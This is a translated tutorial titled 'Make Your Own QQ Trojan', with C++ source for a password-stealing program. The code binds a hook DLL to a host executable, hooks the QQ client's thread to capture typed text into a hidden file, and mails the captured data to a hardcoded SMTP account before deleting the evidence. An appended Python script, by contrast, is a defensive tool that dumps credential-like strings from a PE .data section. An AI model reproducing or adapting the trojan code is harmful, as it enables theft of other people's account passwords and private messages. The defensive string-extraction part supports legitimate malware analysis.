Make Your Own QQ Trojan ----- Overview
Statement:
This article is only meant for beginners, in the hope of freeing them from dull rote exercises so they can actually build something they are interested in. After all, in the tedious world of programming it is interest that keeps you moving forward; it also lifts the veil from the QQ password-interception programs circulating online. I solemnly declare that this article does not encourage anyone to steal other people's account passwords, which is why I only post the important techniques from the source code.
Without further ado, first the ideas behind this program and how it is used.
1. Manually or automatically bind the target file; the program then automatically splits the DLL and the original file back out and runs them.
The file-binding technique used in this program is the most primitive kind and is easily caught by anti-virus software. The structure of the bound file is as follows:
Of course, you could also modify the PE file structure and insert the Trojan that way, but the technical demands are considerably higher. (I have not tried it myself; I only mention it here.)
2. Call your own DLL and set a message hook on the relevant thread of the running target file. Store the intercepted text in a specified file.
3. Read the content from that specified file and send it to the specified mailbox using ESMTP.
Now look at how the program is built and runs: (It is recommended to copy the diagram and zoom in with ACDSee; the picture was drawn in Visio and came out badly, sorry.)
Description: setup.exe is the first file executed after the program is compiled.
Hook.dll is the dynamic link library that exports the hook functions.
Server.exe is the PE file that setup.exe runs after hook.dll; it can be bound to any file other than the DLL file.
123456.EXE is the file split out by Temp.exe; it is the same PE file as Server.exe.
Let's analyze the code of the main program:
    if (!AfxSocketInit())
    {
        AfxMessageBox("IDP_SOCKETS_INIT_FAILED");
        return FALSE;
    }
    // Decide the program's operating mode from the length of this file
    CBindFile curFile;
    if (!curFile.Initiate())   // Main hub; detailed below in the bound-file class
        return TRUE;
    // Get the process information of the split-out PE file that was run
    PROCESS_INFORMATION pi;
    ZeroMemory(&pi, sizeof(pi));
    curFile.GetRunFileProcessInfo(pi);
    // Wait for the child process to enter its message loop
    if (0 != WaitForInputIdle(pi.hProcess, INFINITE))
    {
        MessageBox(NULL, "Error waiting to enter the message loop!", NULL, MB_OK);
        return FALSE;
    }
    // Start the hook
    hDllModule = GetModuleHandle("hook.dll");
    if (NULL == hDllModule)
    {
        hDllModule = LoadLibrary("hook.dll");
        if (NULL == hDllModule)
        {
            MessageBox(NULL, "DLLModule is NULL", "Print", MB_OK);
            return FALSE;
        }
        // Get the address of the exported function
        HOOK_START hook_start_address;
        hook_start_address = (HOOK_START)GetProcAddress(hDllModule, "Hook_Start");
        if (NULL == hook_start_address) return FALSE;
        if (!(hook_start_address)(pi.dwThreadId))
        {
            MessageBox(NULL, "Can not complete hook!", NULL, MB_OK);
            return FALSE;
        }
    }
    // Wait for the second split-out file to finish running
    DWORD dwWaitingTime = 2 * 60 * 1000;   // waiting time is 2 minutes
    WaitForSingleObject(pi.hProcess, dwWaitingTime);
    DWORD dwExitCode;
    GetExitCodeProcess(pi.hProcess, &dwExitCode);
    // After the 2 minutes, stop the hook
    if (NULL != hDllModule)
    {
        HOOK_STOP hook_stop_address;
        hook_stop_address = (HOOK_STOP)GetProcAddress(hDllModule, "Hook_Stop");
        if (NULL == hook_stop_address)
        {
            ::FreeLibrary(hDllModule);
            return FALSE;
        }
        (hook_stop_address)();
        ::FreeLibrary(hDllModule);
    }
    // Send the e-mail
    SendEmail();
    // Delete the split-out temporary file once it has finished running
    if (STILL_ACTIVE == dwExitCode)
    {
        WaitForSingleObject(pi.hProcess, INFINITE);
        GetExitCodeProcess(pi.hProcess, &dwExitCode);
    }
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    DeleteFile(curFile.GetSecFilePath());
    return TRUE;
Here is the SendEmail function:
BOOL CSetupApp::SendEmail()
{
    HANDLE hFile = NULL;
    DWORD dwDummy = 0;
    BOOL bResult = FALSE;
    TCHAR *lpFileString = NULL;   // file data buffer
    DWORD dwFileSize = 0;         // file length
    hFile = CreateFile(FILE_PATH_NAME, GENERIC_READ,
                       FILE_SHARE_READ, NULL,
                       OPEN_ALWAYS, FILE_ATTRIBUTE_HIDDEN, NULL);
    if (INVALID_HANDLE_VALUE == hFile)
        return FALSE;
    dwFileSize = GetFileSize(hFile, NULL);
    lpFileString = new TCHAR[dwFileSize + 1];
    if (NULL == lpFileString)
    {
        CloseHandle(hFile);   // do not leak the handle on allocation failure
        return FALSE;
    }
    ZeroMemory(lpFileString, dwFileSize + 1);
    SetFilePointer(hFile, 0, NULL, FILE_BEGIN);
    bResult = ReadFile(hFile, lpFileString, dwFileSize, &dwDummy, NULL);
    CloseHandle(hFile);
    if (0 != lstrlen(lpFileString))
    {
        // Send the data file to the specified mailbox
        MAILMSG mailMsg;
        lstrcpy(mailMsg.mail_server_name, "SMTP.21CN.com");
        mailMsg.mail_server_port = 25;
        lstrcpy(mailMsg.mail_account, "Zyfxyz");
        lstrcpy(mailMsg.mail_password, "12345678");   // Better to use an encrypted string; otherwise your password is readable in the PE file's .data section
        lstrcpy(mailMsg.mail_from_address, "Zyfxyz@21cn.com");
        lstrcpy(mailMsg.mail_to_address, "Zyfxyz@21cn.com");
        lstrcpy(mailMsg.mail_subject, "Return");
        ZeroMemory(mailMsg.mail_content, sizeof(mailMsg.mail_content));
        if (dwFileSize > 800)   // the DATA content of each mail must not exceed 1000 bytes
            dwFileSize = 800;
        lstrcpyn(mailMsg.mail_content, lpFileString, dwFileSize + 1);
        CSMTP_FZ smtp(mailMsg);
        if (smtp.SendMail())
        {
            // Remove the data file if sending succeeded
            MessageBox(NULL, "Send success, delete data file", NULL, MB_OK);
            DeleteFile(FILE_PATH_NAME);   // FILE_PATH_NAME is the file holding the captured text data
        }
    }
    delete[] lpFileString;
    return TRUE;
}
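The comment beside the mail password above (it sits readable in the PE .data section) is the kind of thing a reviewer or incident responder checks for rather than takes on faith. As an added example that is not part of the original article, this Python script walks the PE section table, dumps the printable strings stored in .data and flags the ones that look like a mail host, mail address or password; build_sample_pe and the byte strings fed to it are constructed test input, not a real binary.

```python
import re
import struct

PRINTABLE = re.compile(rb"[\x20-\x7e]{6,}")                    # runs of 6+ printable ASCII bytes
HINT = re.compile(rb"(?i)(smtp\.|pop3?\.|@[\w-]+\.\w+|pass)")   # mail host / address / password markers


def pe_sections(image: bytes):
    """Yield (name, raw_offset, raw_size) for every section header in a PE image."""
    if image[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew, = struct.unpack_from("<I", image, 0x3C)
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                                   # IMAGE_FILE_HEADER follows the signature
    num_sections, = struct.unpack_from("<H", image, coff + 2)
    opt_size, = struct.unpack_from("<H", image, coff + 16)
    sec = coff + 20 + opt_size                            # first IMAGE_SECTION_HEADER
    for _ in range(num_sections):
        name, _vsize, _va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", image, sec)
        yield name.rstrip(b"\0").decode("ascii", "replace"), raw_ptr, raw_size
        sec += 40                                         # section headers are 40 bytes each


def section_strings(image: bytes, section: str = ".data"):
    """All printable strings stored in the named section (what a hex editor would show)."""
    return [m.group().decode("ascii")
            for name, ptr, size in pe_sections(image) if name == section
            for m in PRINTABLE.finditer(image[ptr:ptr + size])]


def credential_hits(strings):
    """Strings that look like mail infrastructure or credentials; the account password
    itself carries no marker, so the full .data listing is still the thing to read."""
    return [s for s in strings if HINT.search(s.encode("ascii"))]


def build_sample_pe(data: bytes) -> bytes:
    """Constructed test input: a minimal PE with a single .data section holding `data`."""
    dos = b"MZ" + b"\0" * 0x3A + struct.pack("<I", 0x40)            # e_lfanew points at 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0, 0)           # i386, 1 section, no optional header
    raw_ptr = 0x40 + 4 + 20 + 40                                      # headers end here, data begins
    sec = struct.pack("<8sIIII", b".data", len(data), 0x1000, len(data), raw_ptr) + b"\0" * 16
    return dos + b"PE\0\0" + coff + sec + data
```

Run it against a real sample with `section_strings(open(path, "rb").read())`; a hook-and-mail binary like the one above shows its server, account and password in one glance.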
The following sections will explain the bound-file class CBindFile, the mail-sending class CSMTP_FZ, and hook.dll.